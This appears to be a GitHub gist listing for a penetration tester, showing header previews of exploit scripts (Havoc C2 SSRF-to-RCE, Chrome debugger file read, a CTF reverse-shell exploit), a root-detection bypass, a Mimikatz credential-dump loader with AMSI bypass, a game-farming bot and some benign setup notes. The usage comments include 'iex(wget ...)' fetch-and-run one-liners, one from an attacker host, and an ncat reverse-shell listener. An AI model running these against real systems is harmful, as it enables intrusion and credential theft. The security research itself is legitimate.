Skip to content

Instantly share code, notes, and snippets.

View pich4ya's full-sized avatar

LongCat pich4ya

132 followers · 1 following
View GitHub Profile
@pich4ya
pich4ya / havoc_ssrf2rce.py
Last active January 28, 2026 01:26
The modified exploit code of SSRF (CVE-2024-41570) from @_chebuya and authN RCE from Laurence Tennant, Include Security
# Havoc C2 SSRF to AuthN RCE
# @author longcat (https://sth.sh)
#
# sudo ncat -lvp 443
# python havoc_ssrf2rce.py -t https://havoc.c2/ -l 1.3.3.7 --c2user 5pider --c2pass RKnnj5Vfq3bt9y7L
#
# The original authors are @_chebuya (SSRF) and Laurence Tennant, Include Security (AuthN RCE)
# Their writeups are great. I am so fascinating to read @_chebuya blog post :)
# My work is just to integrate them into one single shot exploit.
# In short, make WebSocket works with Havoc C2 Agent Payload
@pich4ya
pich4ya / chrome_remote_debug_lfi.py
Created March 6, 2023 11:49
Chrome Debugger Local File Inclusion (No CVE, a security misconfiguration if the port is accessible for the attacker)
#!/usr/bin/env python
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Ported from https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/chrome_debugger.rb
# pip install requests websocket-client python-socks
# This exploit code can be used to read arbitrary files on the victim machine with
# chrome/chromium --remote-debugging-port=9222, usually runs as a test automation tool in any software testing phase
import requests
import json
import urllib3
import websocket
@pich4ya
pich4ya / root_bypass.js
Created August 5, 2019 20:14
Bypass Android Root Detection / Bypass RootBeer - August 2019
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
@pich4ya
pich4ya / proxychains-ng_m1.txt
Created March 6, 2023 03:25
Install proxychains-ng on macOS m1/m2 arm64e natively without Rosetta 2 (2023)
# @author Pichaya Morimoto (p.morimoto@sth.sh)
Problem:
```bash
brew install proxychains-ng
proxychains4 ncat 1.2.3.4 # not working
```
There are public workarounds like https://benobi.one/posts/running_brew_on_m1_for_x86/
@pich4ya
pich4ya / Invoke-OneShot-Mimikatz.ps1
Last active August 28, 2025 11:32
Invoke-OneShot-Mimikatz.ps1 - One Shot for Mimikatz PowerShell Dump All Creds with AMSI Bypass 2022 Edition (Tested and worked on Windows 10 x64 patched 2022-03-26)
# TLDR:
# iex(wget https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/e32760420ae642123599b6c9c2fddde2ecaf7a2b/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
#
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# One Shot for M1m1katz PowerShell Dump All Creds with AMSI Bypass 2022 Edition
# (Tested and worked on Windows 10 x64 patched 2022-03-26)
#
# Usage:
# 1. You need a local admin user's powershell with Medium Mandatory Level (whoami /all)
# 2. iex(wget https://attacker-local-ip/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
@pich4ya
pich4ya / alienworlds_bot.js
Created April 12, 2021 06:13
// บอทปั้มเงิน TLM เกม Alien Worlds (เงินจะเอาไปแลกเงินจริงใน Binance ได้)
// ไว้ทดสอบเฉย ๆ อย่าเอาไปใช้จริง คนเขียนไม่รับผิดชอบต่อบั๊กใด ๆ ทั้งสิ้น
//
// วิธีใช้:
// 1. สมัคร + เข้า https://play.alienworlds.io/
// 2. ต้องเคย mine แบบ manual ก่อน 1 ครั้ง
// 3. ก๊อปสคริปท์นี้ไปแปะใน Console (F12)
// น่าจะมีบั๊กพวก rate limit อะไรทั้งหลาย กับ if/loop บางอันเอาออกได้
// ลองรันเล่น ๆ 5 ชม จาก user เปล่า ๆ ได้มา 8 TLM (ขึ้นกับดวงและอื่นๆด้วยมั่ง)
// ใครว่าง ๆ แก้เป็นยิงเข้า API โดยตรงไม่ผ่าน JS น่าจะเสถียรกว่าเยอะมาก
@pich4ya
pich4ya / Find-AclSth.ps1
Created April 16, 2022 12:28
Modified version of PowerView's Find-InterestingDomainAcl (Previously known as Invoke-ACLScanner) / Require PowerView.ps1
function Find-AclSth {
<#
.SYNOPSIS
Finds object ACLs in the current (or specified) domain with modification
rights set to non-built in objects.
Thanks Sean Metcalf (@pyrotek3) for the idea and guidance.
Author: Will Schroeder (@harmj0y)
@pich4ya
pich4ya / docker_context.txt
Created February 16, 2019 22:53
How to fix "ERROR: No build stage in current context"
Problem:
$ docker-compose up --build
Building xxx
ERROR: No build stage in current context
Analysis:
Dockerfile
@pich4ya
pich4ya / apk_getString_R_string.py
Last active January 19, 2025 15:28
This script can be used to replace strings.xml values in a target Java file
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# I tried all jadx options for debof, but it did not work.
# This script can be used to replace strings.xml values in a target Java file
# if (!Intrinsics.areEqual(param, context.getString(R.string.m1))) { -> if (!Intrinsics.areEqual(param, "monday")) {
# Prompted and modified with ChatGPT for FlareOn 10's ItsOnFire
# Usage: python apk_getString_R_string.py resources/res/values/strings.xml sources/com/secure/itsonfire/MessageWorker.java
# Usage: python apk_getString_R_string.py resources/res/values/strings.xml sources
import xml.etree.ElementTree as ET
import re
import sys
@pich4ya
pich4ya / bookclub_exploit_rce.py
Last active December 29, 2024 07:42
Exploit for SEC Playground Bloody Xmas 2024 - Bookclub
#!/usr/bin/env python
# @author: longcat
# SEC Playground Bloody Xmas 2024 - Bookclub
# Exploit #2 - Read Flag w/ RCE (Reverse Shell)
import requests
import sys
import time
import argparse
import urllib3